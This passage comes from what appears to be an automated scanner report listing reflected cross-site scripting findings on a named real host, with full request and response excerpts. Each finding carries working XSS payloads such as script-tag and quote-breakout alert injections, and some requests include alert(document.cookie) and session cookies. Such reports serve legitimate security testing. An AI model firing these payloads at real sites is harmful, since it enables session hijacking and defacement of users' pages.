The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 868a8'-alert(1)-'f02a060b98b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?868a8'-alert(1)-'f02a060b98b=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-12ff1a5fea619416a5f0454d1931756d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?868a8'-alert(1)-'f02a060b98b=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

1.208. https://secure.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d89"><script>alert(1)</script>fa2ab23bb4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?51d89"><script>alert(1)</script>fa2ab23bb4c=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-c1185e45650eeb9903684867ded578b4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?51d89"><script>alert(1)</script>fa2ab23bb4c=1" method="post">
...[SNIP]...

1.209. https://secure.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea18e"><script>alert(1)</script>01a73cf344e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enea18e"><script>alert(1)</script>01a73cf344e/api/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef= HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:41:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-9c1b20797a760b68d1bcf320b47949d1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enea18e"><script>alert(1)</script>01a73cf344e/api/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef=" method="post">
...[SNIP]...

1.210. https://secure.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 135f0"><script>alert(1)</script>4689ac62e53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/api135f0"><script>alert(1)</script>4689ac62e53/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef= HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; nkey=WMA4D528314AD809

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:41:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ede973fd35763e7cc9f4de62b6659d65"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/api135f0"><script>alert(1)</script>4689ac62e53/checkreferrer.php?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef=" method="post">
...[SNIP]...

1.211. https://secure.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/api/checkreferrer.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d516f"><script>alert(1)</script>8c0c9114fe3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/api/checkreferrer.phpd516f"><script>alert(1)</script>8c0c9114fe3?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef= HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; nkey=WMA4D528314AD809

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:41:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2f1f90e413017b9ae31d959c7b980287"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/api/checkreferrer.phpd516f"><script>alert(1)</script>8c0c9114fe3?vjsRef=http%3A%2F%2Fburp%2Fshow%2F1&vref_string=NaN&vserverRef=" method="post">
...[SNIP]...

1.212. https://secure.watchmouse.com/en/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78385"><script>alert(1)</script>70cefa9d93e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en78385"><script>alert(1)</script>70cefa9d93e/index.php HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:45 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-bbb7b4d62458697c0c77d7a5ae3089ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en78385"><script>alert(1)</script>70cefa9d93e/index.php" method="post">
...[SNIP]...

1.213. https://secure.watchmouse.com/en/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d83c"><script>alert(1)</script>419d908d897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/index.php4d83c"><script>alert(1)</script>419d908d897 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:46 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-4ee4bf6bbb35c0a31039b8159b55d868"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/index.php4d83c"><script>alert(1)</script>419d908d897" method="post">
...[SNIP]...

1.214. https://secure.watchmouse.com/en/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2ef'-alert(1)-'734d5cd72d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/index.php3c2ef'-alert(1)-'734d5cd72d HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:47 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-f11ebd7d412915e5e80bd321e8eadeea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::index.php3c2ef'-alert(1)-'734d5cd72d');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.215. https://secure.watchmouse.com/en/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d889e"><script>alert(1)</script>e0ab6664ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/index.php?d889e"><script>alert(1)</script>e0ab6664ecc=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:35 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-99fd5c02e24002e34e089d9fc81ca7bb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/index.php?d889e"><script>alert(1)</script>e0ab6664ecc=1" method="post">
...[SNIP]...

1.216. https://secure.watchmouse.com/en/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433cc'-alert(1)-'69fa900d091 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/index.php?433cc'-alert(1)-'69fa900d091=1 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-27ae6b927411d02a3806e576421a9f66"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::index.php?433cc'-alert(1)-'69fa900d091=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

1.217. https://secure.watchmouse.com/en/learn_more.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d70f"><script>alert(1)</script>13cc805ad41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en7d70f"><script>alert(1)</script>13cc805ad41/learn_more.php HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:46 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-735bbb43f3b0352e9355ebe02058e15c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en7d70f"><script>alert(1)</script>13cc805ad41/learn_more.php" method="post">
...[SNIP]...

1.218. https://secure.watchmouse.com/en/learn_more.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52cbc"><script>alert(1)</script>0aea601631c was submitted in the REST URL parameter 2. This input was echoed unmodif